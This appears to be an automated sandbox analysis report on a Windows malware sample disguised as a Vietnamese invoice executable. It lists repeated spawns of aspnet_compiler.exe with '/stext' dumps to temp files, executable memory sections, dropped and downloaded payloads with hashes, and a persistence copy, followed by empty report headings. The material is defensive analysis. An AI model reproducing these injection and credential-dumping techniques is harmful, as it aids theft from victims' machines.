Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior

ID:	778240
Product:	CloudBasic
Start time:	09:21:10
Start date:	05.01.2023
Sample:	Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	a07407fce937593044ad512f4a6d7a1e
SHA1:	6fc304eb3856198c1f8b1da8c4a3a52c657274c7
SHA256:	770a25e30c2f095a09570447fd3ab6ecb78de00185d39035a1b87b1d7de89f8c
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.log	ASCII text, with CRLF line terminators	F6D3657BD1FBEF54E7F7BACB2497E327	A0A712015C242DCC28B69CDF567F594627C9CFA0	5B16B4A3E65F04484B12171163A2A739409FA7F8C3D69BF9BAD961618D973301
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	0E4816AC89A716B262402CD1791400DF	A9F39BD3330B1F70535C716B51E55442E930B164	BEA1C74AD8FCB8C06967F98F93275784F5DF8266FF9E6AB06273AE48AFED0F8A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\json[1].json	JSON data	BA32BC32E2332E7BCB3DFD042796DE94	997D44FBAA2577575546C0BC4902F06A56335845	D6FB58DF012C120449C1D849E057C5862992784185D3329B84E27EBBADCDAB77
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	36DE9155D6C265A1DE62A448F3B5B66E	02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3	8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	7388D2AA1EE8C223A479A5CF15F7F24C	01B9F9BD7E7A36F322B05EB3B2BC534AAB78CF58	40927EE2BB65CDF955322719659E777215C1ADCD5C09E2C8F4C225F29F922EBF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgi0vwrh.uo4.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eq3xehn2.mjn.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\bhv107D.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0	211037333A188A888F259473595602F7	C01516099073F36351F64A61CCD120169F37AA0F	EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
C:\Users\user\AppData\Local\Temp\bhv424B.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0	211037333A188A888F259473595602F7	C01516099073F36351F64A61CCD120169F37AA0F	EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
C:\Users\user\AppData\Local\Temp\bhv610E.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0	211037333A188A888F259473595602F7	C01516099073F36351F64A61CCD120169F37AA0F	EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
C:\Users\user\AppData\Local\Temp\bhv8995.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0	211037333A188A888F259473595602F7	C01516099073F36351F64A61CCD120169F37AA0F	EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
C:\Users\user\AppData\Local\Temp\bhv9EB4.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0	211037333A188A888F259473595602F7	C01516099073F36351F64A61CCD120169F37AA0F	EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
C:\Users\user\AppData\Local\Temp\bhvF833.tmp	Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0	211037333A188A888F259473595602F7	C01516099073F36351F64A61CCD120169F37AA0F	EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
C:\Users\user\AppData\Local\Temp\dwn.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	0E4816AC89A716B262402CD1791400DF	A9F39BD3330B1F70535C716B51E55442E930B164	BEA1C74AD8FCB8C06967F98F93275784F5DF8266FF9E6AB06273AE48AFED0F8A
C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\jzlrsem	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Local\Temp\xzhdfxk	Unicode text, UTF-16, little-endian text, with no line terminators	F3B25701FE362EC84616A93A45CE9998	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	A07407FCE937593044AD512F4A6D7A1E	6FC304EB3856198C1F8B1DA8C4A3A52C657274C7	770A25E30C2F095A09570447FD3AB6ECB78DE00185D39035A1B87B1D7DE89F8C
C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe